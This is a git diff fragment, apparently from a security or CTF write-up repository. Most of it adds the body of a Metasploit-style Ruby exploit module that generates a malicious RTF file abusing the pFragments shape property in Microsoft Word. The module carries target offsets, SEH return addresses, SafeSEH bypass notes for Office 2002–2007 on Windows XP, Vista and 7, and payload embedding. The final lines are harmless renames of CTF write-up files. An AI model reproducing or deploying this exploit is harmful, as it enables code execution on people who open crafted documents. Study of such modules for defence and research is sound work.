{ + 'Space' => 512, + 'BadChars' => "\x00", + 'DisableNops' => true # no need + }, + 'Platform' => 'win', + 'Targets' => + [ + # This automatic target will combine all targets into one file :) + [ 'Automatic', { } ], + + # Office v10.6854.6845, winword.exe v10.0.6854.0 + [ 'Microsoft Office 2002 SP3 English on Windows XP SP3 English', + { + 'Offsets' => [ 23532, 45944 ], + #'Ret' => 0x30002491 # p/p/r in winword.exe v10.0.6854.0 + 'Ret' => 0x30002309 # p/p/r in winword.exe v10.0.6866.0 + } + ], + + # Office v11.8307.8324, winword.exe v11.0.8307.0 + # Office v11.8328.8221, winword.exe v11.0.8328.0 + [ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English', + { + 'Offsets' => [ 24580, 51156 ], + 'Ret' => 0x30001bdd # p/p/r in winword.exe + } + ], + + # In order to exploit this bug on Office 2007, a SafeSEH bypass method is needed. + + # Office v12.0.6425.1000, winword.exe v12.0.6425.1000 + [ 'Microsoft Office 2007 SP0 English on Windows XP SP3 English', + { + 'Offsets' => [ 5956 ], + 'Ret' => 0x00290b0b # call ptr to ebp + 30, hits the next record + } + ], + + [ 'Microsoft Office 2007 SP0 English on Windows Vista SP0 English', + { + 'Offsets' => [ 5956 ], + 'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word. + } + ], + + [ 'Microsoft Office 2007 SP0 English on Windows 7 SP0 English', + { + 'Offsets' => [ 5956 ], + 'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word. + } + ], + + + # crash on a deref path to heaven. + [ 'Crash Target for Debugging', + { + 'Offsets' => [ 65535 ], + 'Ret' => 0xdac0ffee + } + ] + ], + 'DisclosureDate' => 'Nov 09 2010', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']), + ]) + end + + def add_target(rest, targ) + targ['Offsets'].each { |off| + seh = generate_seh_record(targ.ret) + rest[off, seh.length] = seh + distance = off + seh.length + jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string + rest[off + seh.length, jmp_back.length] = jmp_back + } + end + + def exploit + + # Prepare a sample SEH frame and backward jmp for length calculations + seh = generate_seh_record(0xdeadbeef) + jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0xffff").encode_string + + # RTF property Array parameters + el_size = sz_rand() + el_count = sz_rand() + + data = '' + # These words are presumably incorrectly used + # assert(amount1 <= amount2) + data << [0x1111].pack('v') * 2 + data << [0xc8ac].pack('v') + + # Filler + if target.name =~ /Debug/i + rest = Rex::Text.pattern_create(0x10000 + seh.length + jmp_back.length) + else + len = 51200 + rand(1000) + rest = rand_text(len + seh.length + jmp_back.length) + rest[0, payload.encoded.length] = payload.encoded + end + + # Stick fake SEH frames here and there ;) + if target.name == "Automatic" + targets.each { |t| + next if t.name !~ /Windows/i + + add_target(rest, t) + } + else + add_target(rest, target) + end + + # Craft the array for the property value + sploit = "%d;%d;" % [el_size, el_count] + sploit << data.unpack('H*').first + sploit << rest.unpack('H*').first + + # Assemble it all into a nice RTF + content = "{\\rtf1" + content << "{\\shp" # shape + content << "{\\sp" # shape property + content << "{\\sn pFragments}" # property name + content << "{\\sv #{sploit}}" # property value + content << "}" + content << "}" + content << "}" + + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(content) + + end + + def sz_rand + bad_sizes = [ 0, 2, 4, 8 ] + x = rand(9) + while bad_sizes.include? x + x = rand(9) + end + x + end +end diff --git a/src/writeup/6.2.3_re_codegate2017_angrybird/angrybird_mod b/src/writeup/6.2.3_re_codegatectf2017_angrybird/angrybird_mod similarity index 100% rename from src/writeup/6.2.3_re_codegate2017_angrybird/angrybird_mod rename to src/writeup/6.2.3_re_codegatectf2017_angrybird/angrybird_mod diff --git a/src/writeup/6.2.3_re_codegate2017_angrybird/angrybird_org b/src/writeup/6.2.3_re_codegatectf2017_angrybird/angrybird_org similarity index 100% rename from src/writeup/6.2.3_re_codegate2017_angrybird/angrybird_org rename to src/writeup/6.2.3_re_codegatectf2017_angrybird/angrybird_org diff --git a/src/writeup/6.2.3_re_codegate2017_angrybird/exp.py b/src/writeup/6.2.3_re_codegatectf2017_angrybird/exp.py similarity index 100% rename from src/writeup/6.2.3_re_codegate2017_angrybird/exp.py rename to src/writeup/6.2.3_re_codegatectf2017_angrybird/exp.py diff --git a/src/writeup/6.2.6_re_seccon2017_printf_machine/default.fs b/src/writeup/6.2.6_re_secconctf2017_printf_machine/default.fs similarity index 100% rename from src/writeup/6.2.6_re_seccon2017_printf_machine/default.fs rename to src/writeup/6.2.6_re_secconctf2017_printf_machine/default.fs diff --git a/src/writeup/6.2.6_re_seccon2017_printf_machine/fsmachine b/src/writeup/6.2.6_re_secconctf2017_printf_machine/fsmachine similarity index 100% rename from src/writeup/6.2.6_re_seccon2017_printf_machine/fsmachine rename to src/writeup/6.2.6_re_secconctf2017_printf_machine/fsmachine diff --git a/src/writeup/6.2.7_re_codegatectf2018_redvelvet/RedVelvet b/src/writeup/6.2.7_re_codegatectf2018_redvelvet/RedVelvet new file mode 100644 index 0000000..f200841 Binary files /dev/null and b/src/writeup/6.2.7_re_codegatectf2018_redvelvet/RedVelvet differ